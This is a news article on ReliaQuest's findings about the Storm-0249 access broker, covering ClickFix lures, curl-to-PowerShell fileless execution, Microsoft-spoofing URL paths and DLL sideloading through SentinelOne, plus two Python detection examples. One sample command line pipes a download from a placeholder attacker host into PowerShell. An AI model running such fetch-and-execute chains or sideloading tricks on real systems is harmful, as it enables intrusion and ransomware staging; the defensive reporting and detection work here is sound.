Storm-0249 hijacks security tools to fuel ransomware
Cybersecurity firm ReliaQuest has identified a shift in tactics by the threat group known as Storm-0249, which it says is now targeting security software and trusted Windows tools in a bid to provide higher-value access for ransomware operators.
The team, described as a seasoned initial access broker (IAB) within the ransomware-as-a-service (RaaS) ecosystem, has moved away from broad phishing activity. It now focuses on stealthy post-exploitation techniques that aim to remain hidden inside enterprise environments for extended periods.
ReliaQuest reports that Storm-0249 has abused SentinelOne's SentinelAgentWorker.exe process as part of several recent attacks. The technique relies on Dynamic Link Library (DLL) sideloading, where a legitimate and digitally signed SentinelOne executable loads a malicious DLL placed alongside it. This makes hostile activity appear as routine endpoint detection and response (EDR) operations.
The group has also added Microsoft domain spoofing and curl-to-PowerShell command chaining to its playbook. These techniques use fake Microsoft-style URLs and trusted utilities such as curl.exe and PowerShell to deliver and execute malicious scripts in memory, which reduces the chance of detection by traditional antivirus tools.
ReliaQuest positions Storm-0249 as a key intermediary in modern ransomware operations. The group sells pre-built, persistent access to compromised networks to ransomware affiliates, which shortens the time between initial intrusion and file encryption and lowers the technical skills required to conduct an attack.
Abusing trusted tools
Recent Storm-0249 activity has started with a social engineering method known as "ClickFix". Victims are tricked into running a command via the Windows Run dialog under the guise of resolving a technical issue. The command appears benign but is likely obfuscated, which obscures its intent from both users and some security controls.
Once the attacker gains an initial foothold, the intrusion unfolds in several stages. The first stage uses curl.exe, a legitimate Windows command-line tool, to reach out to the attacker's infrastructure. Because administrators routinely use curl for tasks such as downloading updates or testing application interfaces, its activity often passes security controls without scrutiny.
Storm-0249 then leverages Microsoft domain spoofing. Malicious scripts are hosted on domains such as sgcipl[.]com, but the URL path includes segments like "/us.microsoft.com/" to resemble an official Microsoft address. This structure can mislead both end users and some filtering tools about the origin of the content.
The downloaded content is not written to disk. Instead, curl pipes the script directly into PowerShell for in-memory execution. This fileless technique avoids leaving artefacts that signature-based antivirus products typically rely on, which complicates forensic review.
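One way a SOC can catch the two patterns just described in process-creation telemetry, as an added example that is not part of ReliaQuest's report or detection content: it flags curl output piped into PowerShell and URLs whose path carries a trusted brand hostname while the real host is something else. The host `attacker.invalid`, the brand list and the sample command lines are constructed assumptions.

```python
import re
from typing import List, Optional
from urllib.parse import urlparse

# Brands whose hostnames get embedded in URL paths; extend for your own estate.
TRUSTED_BRANDS = ("microsoft.com", "windowsupdate.com")
URL_RE = re.compile(r"https?://[^\s'\"|]+")

def brand_in_path(url: str) -> Optional[str]:
    """Return the spoofed brand when a trusted hostname appears as a path
    segment (e.g. '/us.microsoft.com/') but the real host is not that brand."""
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower()
    for brand in TRUSTED_BRANDS:
        legit = host == brand or host.endswith("." + brand)
        pat = r"(^|[./])" + re.escape(brand) + r"(/|$)"
        if not legit and re.search(pat, parsed.path.lower()):
            return brand
    return None

def analyse(cmdline: str) -> List[str]:
    """Flag curl output piped into PowerShell and brand-spoofing URLs."""
    findings = []
    # First token of each pipeline stage, e.g. ["curl.exe", "powershell"]
    stages = [s.split()[0].lower() for s in cmdline.split("|") if s.strip()]
    for producer, consumer in zip(stages, stages[1:]):
        if producer.startswith("curl") and consumer.startswith(("powershell", "pwsh")):
            findings.append("curl output piped into PowerShell (in-memory execution)")
    for url in URL_RE.findall(cmdline):
        brand = brand_in_path(url)
        if brand:
            findings.append(f"{urlparse(url).hostname} spoofs {brand} in the URL path")
    return findings

# Constructed sample command lines; attacker.invalid is a placeholder host.
SAMPLE_COMMANDS = [
    "curl.exe -s https://attacker.invalid/us.microsoft.com/support/fix.txt | powershell -",
    "curl.exe -o kb.msu https://download.microsoft.com/kb.msu",
    "powershell -Command Get-Service",
]

if __name__ == "__main__":
    for cmd in SAMPLE_COMMANDS:
        print(cmd, "->", analyse(cmd) or "clean")
```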
Turning security tools
A central element of the observed campaigns is the use of DLL sideloading against SentinelOne agents. Storm-0249 disguises a trojanised DLL as a legitimate SentinelOne component and drops it into the user's AppData folder. The file sits beside the genuine SentinelAgentWorker.exe process, which later loads it under normal execution flow.
ReliaQuest says the malicious DLL arrives through a booby-trapped MSI installer obtained from a phishing URL that imitates a Microsoft support site. Windows Installer runs with SYSTEM-level privileges, which gives the attacker the ability to place files in protected directories and execute code with full system authority.
When SentinelAgentWorker.exe runs, it loads the attacker's DLL rather than the expected version. The process then acts as a carrier for the adversary's code while still appearing as a trusted, signed EDR executable. Many environments reduce monitoring intensity for such processes in order to limit alert volume.
The same hijacked SentinelOne process then handles command-and-control (C2) communication. Traffic is routed through digitally signed security software rather than unknown binaries. Domains used for C2, such as krivomadogolyhp[.]com and hristomasitomasdf[.]com, are registered close to the time of attack and accessed over Transport Layer Security (TLS), which restricts inspection.
ReliaQuest notes that monitoring DNS lookups for newly registered domains and profiling normal EDR traffic patterns can surface anomalies. It points to factors such as unexpected destination IP addresses, unusual connection frequency and data volumes as potential indicators of compromise.
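The profiling ReliaQuest describes, as an added example that is not the company's own detection logic: it groups outbound connections from SentinelAgentWorker.exe by destination and raises the indicators named above (destination outside the known EDR baseline, newly registered domain, connection count or outbound volume above profile). The baseline domain, thresholds, registration dates and connection sample are constructed assumptions; the C2 domain is the one named in the report, kept defanged as a threat-intel feed would deliver it.

```python
from collections import Counter
from dataclasses import dataclass
from datetime import date
from typing import Dict, List, Set, Tuple

@dataclass
class Conn:
    process: str
    dst_domain: str   # may be defanged ("example[.]com") as in threat intel feeds
    bytes_out: int

def refang(domain: str) -> str:
    return domain.replace("[.]", ".").lower()

# Hypothetical baseline: destinations the agent is known to use in this estate
# and its normal per-host daily profile. Derive real values from your telemetry.
BASELINE: Set[str] = {"mgmt.example-tenant.invalid"}
MAX_CONNS_PER_DOMAIN = 50
MAX_BYTES_OUT = 5_000_000

def triage(conns: List[Conn], reg_dates: Dict[str, date], today: date,
           young_days: int = 30) -> List[Tuple[str, List[str]]]:
    """Flag EDR-process destinations that break the baseline profile."""
    counts: Counter = Counter()
    volume: Counter = Counter()
    for c in conns:
        if c.process.lower() == "sentinelagentworker.exe":
            d = refang(c.dst_domain)
            counts[d] += 1
            volume[d] += c.bytes_out
    alerts = []
    for d, n in counts.items():
        reasons = []
        if d not in BASELINE:
            reasons.append("destination not in EDR baseline")
        reg = reg_dates.get(d)   # registration date from WHOIS/RDAP lookups
        if reg is not None and (today - reg).days < young_days:
            reasons.append(f"domain registered {(today - reg).days} days before activity")
        if n > MAX_CONNS_PER_DOMAIN:
            reasons.append(f"{n} connections exceeds profile")
        if volume[d] > MAX_BYTES_OUT:
            reasons.append(f"{volume[d]} bytes out exceeds profile")
        if reasons:
            alerts.append((d, reasons))
    return alerts

# Constructed sample: registration dates are placeholders, not real WHOIS data.
SAMPLE_REG = {"mgmt.example-tenant.invalid": date(2020, 1, 1),
              "krivomadogolyhp.com": date(2025, 10, 1)}
SAMPLE_CONNS = [Conn("SentinelAgentWorker.exe", "mgmt.example-tenant.invalid", 2_000)] * 10 \
             + [Conn("SentinelAgentWorker.exe", "krivomadogolyhp[.]com", 200_000)] * 60
```

Running `triage(SAMPLE_CONNS, SAMPLE_REG, date(2025, 10, 20))` alerts only on the report's C2 domain, with all four reasons, while the baseline destination stays quiet.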
Reconnaissance for ransom
Beyond establishing covert C2 channels, Storm-0249 uses the compromised SentinelAgentWorker.exe process to run reconnaissance commands. The group invokes standard Windows tools such as reg.exe and findstr.exe to query system identifiers, including MachineGuid, domain membership and installed software.
These utilities are widely used for administration and troubleshooting. Security teams often focus controls on more obviously risky binaries like PowerShell and cmd.exe, which leaves a grey area for less prominent but equally powerful tools.
ReliaQuest said this reconnaissance supports ransomware affiliates that later carry out the encryption phase. Ransomware families, including LockBit and ALPHV, reportedly use MachineGuid to bind encryption keys to specific victim systems. The use of trusted EDR processes as a wrapper for this activity makes the behaviour blend with normal endpoint monitoring traffic.
Broader IAB trend
Storm-0249's tactics reflect a broader shift in IAB operations towards stealth, persistence and identity-focused targeting. Techniques such as DLL sideloading, fileless execution and domain spoofing are not tied to a single vendor and can be replicated against other security or management platforms.
ReliaQuest warns that these methods reduce the effectiveness of standard remediation steps such as agent reinstalls or software patching. The underlying abuse of trusted relationships within the operating system and security stack can allow access to survive routine clean-up work.
The company has linked the behaviour to several MITRE ATT&CK techniques, including DLL sideloading, spear phishing attachments, obfuscated files and dynamic domain resolution. It has also released detection rules focused on ransomware signatures, unmitigated malware and suspicious registry interaction, along with automated response playbooks that isolate hosts, block domains and ban malicious file hashes.
In the context of rising RaaS activity and interest in pre-staged access, ReliaQuest expects techniques demonstrated by Storm-0249 to influence other IABs and spread across sectors.